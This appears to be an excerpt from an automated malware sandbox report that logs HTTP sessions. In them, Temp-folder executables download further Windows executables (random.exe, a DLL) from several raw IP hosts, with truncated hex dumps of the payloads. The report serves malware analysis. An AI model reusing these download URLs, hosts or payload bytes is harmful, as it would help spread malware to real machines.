                                                                                                                                                                                                                                                            Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 4 <c>0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            39192.168.2.449946185.215.113.16806672C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Dec 21, 2024 22:18:05.431663990 CET80OUTGET /mine/random.exe HTTP/1.1
                                                                                                                                                                                                                                                            Host: 185.215.113.16
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            Dec 21, 2024 22:18:06.763056993 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:18:05 GMT
                                                                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                                                                            Content-Length: 3272704
                                                                                                                                                                                                                                                            Last-Modified: Sat, 21 Dec 2024 21:06:30 GMT
                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                            ETag: "67672dd6-31f000"
                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 9a 01 00 00 00 00 00 00 f0 31 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 [TRUNCATED]
                                                                                                                                                                                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$-ICCC@CFBC6GC6@C6FCGCBCB5CxJCxCxACRichCPELVf1@ 22@Wk11 @.rsrc@.idata @scoprlns0+0+@mrzrmbbr11@.taggant01"1@
                                                                                                                                                                                                                                                            Dec 21, 2024 22:18:06.763185024 CET224INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                                            Dec 21, 2024 22:18:06.763200045 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                                            Dec 21, 2024 22:18:06.763355017 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                                            Dec 21, 2024 22:18:06.763370991 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                                            Dec 21, 2024 22:18:06.763628006 CET272INData Raw: e8 b9 34 10 19 19 de 56 50 d5 7e 2c 51 3d 11 c0 94 79 09 a8 43 fe 08 10 39 fe bd cc 94 57 05 28 5c b8 34 10 19 15 e7 56 50 d5 1e 2f 51 3d 11 60 95 79 09 a8 a3 ff 08 10 39 fe bd cc 94 57 f1 28 44 b8 34 10 19 c9 fa 56 50 d5 3e 2f 51 3d 11 80 94 79
                                                                                                                                                                                                                                                            Data Ascii: 4VP~,Q=yC9W(\4VP/Q=`y9W(D4VP>/Q=y9W(h4MVP/Q= y9W(l4aVP/Q=@y9W(d4VP,Q=y#9W(49VP,Q=y9W(4VP^-Q=y
                                                                                                                                                                                                                                                            Dec 21, 2024 22:18:06.763716936 CET1236INData Raw: 97 79 09 a8 43 ff 08 10 39 fe bd cc 94 57 f5 28 04 b8 34 10 19 41 fa 56 50 d5 1e 2c 51 3d 11 60 94 79 09 a8 a3 fc 08 10 39 fe bd cc 94 57 f5 28 3c b8 34 10 19 49 de 56 50 d5 3e 2c 51 3d 11 80 97 79 09 a8 83 fc 08 10 39 fe bd cc 94 57 f5 28 34 b8
                                                                                                                                                                                                                                                            Data Ascii: yC9W(4AVP,Q=`y9W(<4IVP>,Q=y9W(44aVP,Q= y9W(,4VP,Q=@y9W($4VP-Q=y#9W(4YVP-Q=y9W(4VP^*Q=yc9W(4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:18:06.763734102 CET1236INData Raw: 19 49 dd 56 50 d5 5e 36 51 3d 11 a0 85 79 09 a8 63 60 09 10 39 fe bd cc 94 57 f1 28 68 ba 34 10 19 19 fb 56 50 d5 7e 36 51 3d 11 c0 86 79 09 a8 43 60 09 10 39 fe bd cc 94 57 05 28 6c ba 34 10 19 f1 de 56 50 d5 1e 39 51 3d 11 60 87 79 09 a8 a3 61
                                                                                                                                                                                                                                                            Data Ascii: IVP^6Q=yc`9W(h4VP~6Q=yC`9W(l4VP9Q=`ya9W(4VP>9Q=ya9W(84VP9Q= ya9W( 4VP9Q=@ya9W(4AVP6Q=y#a9W(4QVP6Q=ya
                                                                                                                                                                                                                                                            Dec 21, 2024 22:18:06.763748884 CET1236INData Raw: 39 fe bd cc 94 57 f1 28 c4 b6 34 10 19 01 d2 56 50 d5 be 32 51 3d 11 00 b4 79 09 a8 03 65 09 10 39 fe bd cc 94 57 f1 28 e8 b6 34 10 19 a9 df 56 50 d5 5e 33 51 3d 11 a0 b4 79 09 a8 63 65 09 10 39 fe bd cc 94 57 19 28 ec b6 34 10 19 01 f8 56 50 d5
                                                                                                                                                                                                                                                            Data Ascii: 9W(4VP2Q=ye9W(4VP^3Q=yce9W(4VP~3Q=yCe9W(4VP2Q=`yj9W(4VP>2Q=yj9W(4VP2Q= yj9W(4QVP2Q=@yj9W(4VP
                                                                                                                                                                                                                                                            Dec 21, 2024 22:18:06.763765097 CET1236INData Raw: cb d8 4c d5 94 f1 bd cc 94 f1 bd cc 94 f1 bd cc 94 48 72 ad cb 70 f1 8f 1d 0d 59 23 a7 28 fd a8 f5 a2 ae 81 d3 f9 fd 5f 93 f1 bd cc 94 f1 bd cc 94 48 72 ad d3 d1 fd 73 4d 1d 37 10 63 f8 70 54 a4 b6 44 08 d5 78 a5 26 cb ac 70 24 ac b0 3f 14 9e 78
                                                                                                                                                                                                                                                            Data Ascii: LHrpY#(_HrsM7cpTDx&p$?x2F;=Y6Wp5rcOL\=Hr|W\M84>2x9YCL\=H<=Y90WPHr984
                                                                                                                                                                                                                                                            Dec 21, 2024 22:18:06.883059025 CET1236INData Raw: 6b fb 70 4c b0 4c 5b fd 88 2a d4 95 25 c1 19 8f 5c 33 70 54 b8 b0 34 c8 57 7e 34 c8 53 ad 47 a8 e9 07 0a 10 cb 78 a9 95 9c 31 b7 14 5e 3d 92 e0 9e 78 a9 10 a7 28 a9 23 d5 70 b1 a8 25 5a 08 10 cb 48 b5 95 da 0d 3b ec cb 70 79 53 cb fc 88 ba 50 0d
                                                                                                                                                                                                                                                            Data Ascii: kpLL[*%\3pT4W~4SGx1^=x(#p%ZH;pySP"rHkWP=[#R_PW<p_WP>xQ?&zApW=P6xP= x p<H]5;4h<=P/s


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            40192.168.2.44994831.41.244.11801740C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Dec 21, 2024 22:18:06.182430983 CET61OUTGET /files/martin/random.exe HTTP/1.1
                                                                                                                                                                                                                                                            Host: 31.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:18:07.524291039 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:18:07 GMT
                                                                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                                                                            Content-Length: 4534272
                                                                                                                                                                                                                                                            Last-Modified: Sat, 21 Dec 2024 21:12:07 GMT
                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                            ETag: "67672f27-453000"
                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 c6 e7 66 67 00 00 00 00 00 00 00 00 e0 00 0e 03 0b 01 02 28 00 d4 4e 00 00 c6 74 00 00 32 00 00 00 40 c9 00 00 10 00 00 00 f0 4e 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 70 c9 00 00 04 00 00 48 4b 45 00 02 00 40 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5f 10 72 00 73 00 00 00 00 00 72 00 ac 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 20 c9 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 20 c9 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELfg(Nt2@N@pHKE@ _rsr p q(@.rsrcr(@.idata r(@ : r(@agnlrrtx`T(@dgeihioi0E@.taggant0@"E@
                                                                                                                                                                                                                                                            Dec 21, 2024 22:18:07.524413109 CET224INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                                            Dec 21, 2024 22:18:07.524426937 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                                            Dec 21, 2024 22:18:07.524487972 CET224INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                                            Dec 21, 2024 22:18:07.524512053 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                                            Dec 21, 2024 22:18:07.524528027 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                            Data Ascii: *] tnj\}-,s@t
                                                                                                                                                                                                                                                            Dec 21, 2024 22:18:07.524768114 CET448INData Raw: 98 23 c4 f6 69 c3 72 0c 36 d1 94 ff a5 be 82 cc 46 bb 3c 0c 6d d0 82 a7 a8 73 54 a3 50 0f 5c d9 dd 31 9e 98 3d e1 68 5d 97 f1 4f 42 a2 88 eb 32 f5 bc 90 52 5a 85 41 63 6e a1 91 a1 a2 ac 44 9b ae dd 68 a6 61 5a 43 e8 f6 f9 f2 b8 3b 23 6c c6 89 50
                                                                                                                                                                                                                                                            Data Ascii: #ir6F<msTP\1=h]OB2RZAcnDhaZC;#lPFCS9+P D|@VG}x "U>cDP7#,c0UzH)ijwW"5r9E-}}H=:B~{Baao8SYM
                                                                                                                                                                                                                                                            Dec 21, 2024 22:18:07.524782896 CET1236INData Raw: b3 d9 78 25 d6 4f d5 03 a8 09 ec 77 c5 31 ab 96 e7 ef 28 9e 47 1b 49 f7 98 c9 e8 c4 8c 7f f0 19 b1 01 72 9d c8 c6 5e a6 f0 57 d5 b1 04 7f e1 28 9c 8b 49 77 82 9c 56 66 02 1b b1 a3 c0 8f 58 a1 23 0d 61 6f 23 4b 62 2b 73 3f 5c 94 1f 1b 09 e8 bc 09
                                                                                                                                                                                                                                                            Data Ascii: x%Ow1(GIr^W(IwVfX#ao#Kb+s?\6jaPSDZ)[HI6Kl y%$WR$n)bq8sQuT:R9B*aNJ~xw,4arg/q8.rW[bEcXWPa
                                                                                                                                                                                                                                                            Dec 21, 2024 22:18:07.524926901 CET1236INData Raw: 69 1f e1 98 a9 29 8c 9b 6d 22 4e 75 ae 63 1c 04 e8 fc 53 94 bd 77 d0 b5 be 88 4f ea 33 32 71 35 e9 4f 45 09 04 6b 69 57 6e 49 c0 9d 81 3b fa 02 4a 29 27 05 41 75 79 e1 f4 65 8a 31 66 7e 78 45 9d ed c0 ce 0e 70 cd 28 49 66 f9 3a 9a 77 00 9f 69 3e
                                                                                                                                                                                                                                                            Data Ascii: i)m"NucSwO32q5OEkiWnI;J)'Auye1f~xEp(If:wi>4? P'|4-STtO?yT7Sjhr44OF_|h3E\.:x(z3)qHsw(wL3w[[fKmpW#'S#
                                                                                                                                                                                                                                                            Dec 21, 2024 22:18:07.525008917 CET448INData Raw: bd fe 7d f6 00 92 0b 45 26 93 95 c8 47 f0 52 23 df 53 05 e0 e1 9d e6 1d 3e c7 c3 eb d3 2f e8 e7 01 f7 84 82 56 1a 97 a6 38 5e a2 44 b4 4c 9c 1c f1 fc 9c 1b 35 c3 11 34 13 aa cf 36 a6 eb 62 eb 1a a8 ad ef 29 e6 48 dc f4 31 56 8e 34 ba c4 4a 28 eb
                                                                                                                                                                                                                                                            Data Ascii: }E&GR#S>/V8^DL546b)H1V4J(5l=L`bBBpAKQq!pkfg.-B8.hciZ]L|s;)<Vq%Qh83mRk=f1d`%)%{'
                                                                                                                                                                                                                                                            Dec 21, 2024 22:18:07.644167900 CET1236INData Raw: 2f f4 17 ae 58 5a 3e c0 01 09 c7 a4 c4 79 67 1d 95 ff 66 cb 52 8b 61 14 15 4f ff 3a f5 9a 7d a5 01 c7 5a 07 9f 2b 15 01 f3 87 80 a6 09 77 0b 86 f6 88 ff d6 f7 db e6 84 34 3f 4f bd db 02 e0 3c fe 6b 43 1b cd 24 13 b6 75 1d 6c e6 7d 98 65 20 36 51
                                                                                                                                                                                                                                                            Data Ascii: /XZ>ygfRaO:}Z+w4?O<kC$ul}e 6QF{V9X+h<{c~T}Sl'0yu~#!x{S2w '#C|C,TsRy0;x?kg|PI/_;txm;6oJ/<Oj


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            41192.168.2.449950185.156.73.23807124C:\Users\user\AppData\Local\Temp\1019669001\c9692f9101.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Dec 21, 2024 22:18:07.160115957 CET394OUTGET /soft/download HTTP/1.1
                                                                                                                                                                                                                                                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                                                                                                                                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                                                                                                                                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                                                                                                                                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                                                                                                                                            User-Agent: d
                                                                                                                                                                                                                                                            Host: 185.156.73.23
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            Dec 21, 2024 22:18:08.640023947 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:18:08 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                                                            Content-Disposition: attachment; filename="dll";
                                                                                                                                                                                                                                                            Content-Length: 242176
                                                                                                                                                                                                                                                            Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                                                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 4a 6c ef 58 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0b 00 00 a8 03 00 00 08 00 00 00 00 00 00 2e c6 03 00 00 20 00 00 00 e0 03 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 04 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 c5 03 00 57 00 00 00 00 e0 03 00 10 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELJlX!. @W H.text4 `.rsrc@@.reloc@BH`4eU}Yy={Xx=rpo2o(3o2}*:s(**2rp(;&*Vrprp*(*>}*(Co(D(E}(F(E(G&*>}*(Co(D}(F(E(H&*"*>}*R} { oo*{ *"}!*{!*}{#{op{,{ oo*{!oo*{*Bsu
                                                                                                                                                                                                                                                            Dec 21, 2024 22:18:08.640039921 CET224INData Raw: 00 00 0a 28 76 00 00 0a 2a 8a 02 7b 23 00 00 04 02 7b 23 00 00 04 6f 77 00 00 0a 02 6f 78 00 00 0a 28 2b 00 00 06 6f 79 00 00 0a 2a a6 02 7b 1f 00 00 04 2c 0e 02 02 7b 20 00 00 04 6f 6f 00 00 0a 2b 0c 02 02 7b 21 00 00 04 6f 6f 00 00 0a 02 28 32
                                                                                                                                                                                                                                                            Data Ascii: (v*{#{#owox(+oy*{,{ oo+{!oo(2*z,{",{"o/(z*((X[((X[((X[(q*~(-(-(***~to(
                                                                                                                                                                                                                                                            Dec 21, 2024 22:18:08.640054941 CET1236INData Raw: 33 00 00 06 02 74 13 00 00 01 17 6f b6 00 00 0a 2a 5e 28 b9 00 00 0a 72 e4 11 00 70 1b 6f ba 00 00 0a 15 31 02 17 2a 16 2a 3e 02 fe 15 10 00 00 02 02 03 7d 25 00 00 04 2a be 02 03 28 43 00 00 0a 04 d6 8c 6f 00 00 01 28 44 00 00 0a 28 45 00 00 0a
                                                                                                                                                                                                                                                            Data Ascii: 3to*^(rpo1**>}%*(Co(D(E}%(F(E(&*>}**(Co(D}*(F(E(&*"*>}4*{Eorprpo(*j};({=
                                                                                                                                                                                                                                                            Dec 21, 2024 22:18:08.640153885 CET1236INData Raw: 28 b7 00 00 06 2a 46 02 7b 63 00 00 04 6f ff 00 00 0a 74 11 00 00 01 2a 62 02 7b 63 00 00 04 03 6f 00 01 00 0a 02 73 fd 00 00 0a 6f e8 00 00 0a 2a 32 02 7b 64 00 00 04 6f 77 00 00 0a 2a 7e 02 7b 64 00 00 04 03 6f 79 00 00 0a 02 03 7d 5e 00 00 04
                                                                                                                                                                                                                                                            Data Ascii: (*F{cot*b{coso*2{dow*~{doy}^so*F{dot*b{doso*2{eo*N{eo(*2{eox*R}[{eo*{N*>oo}N*{X*:}X
                                                                                                                                                                                                                                                            Dec 21, 2024 22:18:08.640168905 CET448INData Raw: 00 0a 2a 86 02 7b 84 00 00 04 6f 39 01 00 0a 02 28 07 01 00 06 6f 40 01 00 0a 6f 36 00 00 0a 6f 54 00 00 0a 2a 1e 02 7b 80 00 00 04 2a b6 02 7b 84 00 00 04 6f 39 01 00 0a 6f 42 01 00 0a 02 16 8d 65 00 00 01 7d 80 00 00 04 02 7b 83 00 00 04 72 a8
                                                                                                                                                                                                                                                            Data Ascii: *{o9(o@o6oT*{*{o9oBe}{rpo*2{o*6{o*2{o*f{o{o*Z{orp(*J{oo*{*6{o*2{o*6{o
                                                                                                                                                                                                                                                            Dec 21, 2024 22:18:08.640697956 CET1236INData Raw: 03 7d 8b 00 00 04 02 02 7b 8b 00 00 04 28 28 00 00 06 2a 52 02 02 7b 8b 00 00 04 28 28 00 00 06 02 03 28 4e 01 00 0a 2a ae 02 28 4f 01 00 0a 25 25 6f 50 01 00 0a 20 00 00 02 00 60 6f 51 01 00 0a 25 25 6f 52 01 00 0a 20 00 00 00 02 60 6f 53 01 00
                                                                                                                                                                                                                                                            Data Ascii: }{((*R{(((N*(O%%oP `oQ%%oR `oS*z,{,{o/(T*{*}{{o{(H*{*}{{o{(H*{*R}{(H*{
                                                                                                                                                                                                                                                            Dec 21, 2024 22:18:08.640782118 CET1236INData Raw: 13 02 7b bc 00 00 04 2c 0b 02 7b bc 00 00 04 6f 2f 00 00 0a 02 03 28 5b 01 00 0a 2a e6 02 28 f8 00 00 0a 7d c1 00 00 04 02 28 7b 01 00 0a 7d c2 00 00 04 02 28 7b 01 00 0a 7d c3 00 00 04 02 72 a8 0f 00 70 7d c5 00 00 04 02 28 72 00 00 0a 02 28 cf
                                                                                                                                                                                                                                                            Data Ascii: {,{o/([*(}({}({}rp}(r(*2{o*r0rpsAz{o*{*:}(*{*:}(*{*:}(*({oX/{oX((
                                                                                                                                                                                                                                                            Dec 21, 2024 22:18:08.640870094 CET448INData Raw: 7d e5 00 00 04 02 28 19 02 00 06 02 28 1d 02 00 06 2a 7a 03 2c 13 02 7b e7 00 00 04 2c 0b 02 7b e7 00 00 04 6f 2f 00 00 0a 02 03 28 7a 00 00 0a 2a 92 02 28 72 00 00 0a 02 28 2e 02 00 06 02 73 fd 00 00 0a 6f e8 00 00 0a 28 d7 00 00 0a 26 02 28 32
                                                                                                                                                                                                                                                            Data Ascii: }((*z,{,{o/(z*(r(.so(&(2*{*2{o*6{oo*(#,{o*{o*(#,{o*{o*z,{,{o/(z*2{ow*{oy
                                                                                                                                                                                                                                                            Dec 21, 2024 22:18:08.640892029 CET1236INData Raw: 02 00 06 28 2b 00 00 06 7d ff 00 00 04 02 28 4d 02 00 06 2a 1e 02 7b fe 00 00 04 2a b6 02 03 7d fe 00 00 04 02 6f a0 01 00 0a 2c 17 02 02 6f a0 01 00 0a 02 28 50 02 00 06 28 2b 00 00 06 7d 00 01 00 04 02 28 4d 02 00 06 2a 7a 03 2c 13 02 7b 01 01
                                                                                                                                                                                                                                                            Data Ascii: (+}(M*{*}o,o(P(+}(M*z,{,{o/(z*{*:}(m*{*:}(m*{*:}(m*{*:}(m*{*{*:}(m*{*:}
                                                                                                                                                                                                                                                            Dec 21, 2024 22:18:08.641119003 CET1236INData Raw: 00 04 2a 66 02 03 7d 29 01 00 04 02 7b 2c 01 00 04 02 7b 29 01 00 04 28 29 00 00 06 2a 1e 02 7b 29 01 00 04 2a 1e 02 7b 25 01 00 04 2a aa 02 03 7d 25 01 00 04 02 7b 2c 01 00 04 02 28 9a 00 00 0a 1f 0f 59 02 7b 26 01 00 04 5a 02 7b 25 01 00 04 5b
                                                                                                                                                                                                                                                            Data Ascii: *f}){,{)()*{)*{%*}%{,(Y{&Z{%[o*6{,oo*2{,o*6{+oo*2{+o*z,{*,{*o/(z**6(&(*R(&o(*z,{-,{-o/(*2
                                                                                                                                                                                                                                                            Dec 21, 2024 22:18:08.759912968 CET1236INData Raw: 19 01 00 0a 02 28 3f 03 00 06 2a 22 02 03 7d 57 01 00 04 2a 1e 02 7b 59 01 00 04 2a 22 02 03 7d 59 01 00 04 2a 4a 02 7b 57 01 00 04 02 7b 58 01 00 04 6f ce 01 00 0a 2a 7a 03 2c 13 02 7b 5b 01 00 04 2c 0b 02 7b 5b 01 00 04 6f 2f 00 00 0a 02 03 28
                                                                                                                                                                                                                                                            Data Ascii: (?*"}W*{Y*"}Y*J{W{Xo*z,{[,{[o/(*rpr,p(BrprHp(B(9*VrRprprp(A*Vrp]~^*>9}_*(Co(D(E}_(F(E(&*>:}


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            42192.168.2.449955185.156.73.23807124C:\Users\user\AppData\Local\Temp\1019669001\c9692f9101.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Dec 21, 2024 22:18:10.089627981 CET394OUTGET /soft/download HTTP/1.1
                                                                                                                                                                                                                                                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                                                                                                                                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                                                                                                                                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                                                                                                                                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                                                                                                                                            User-Agent: s
                                                                                                                                                                                                                                                            Host: 185.156.73.23
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Cache-Control: no-cache


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            0192.168.2.449794172.67.209.2024437908C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-12-21 21:16:26 UTC266OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
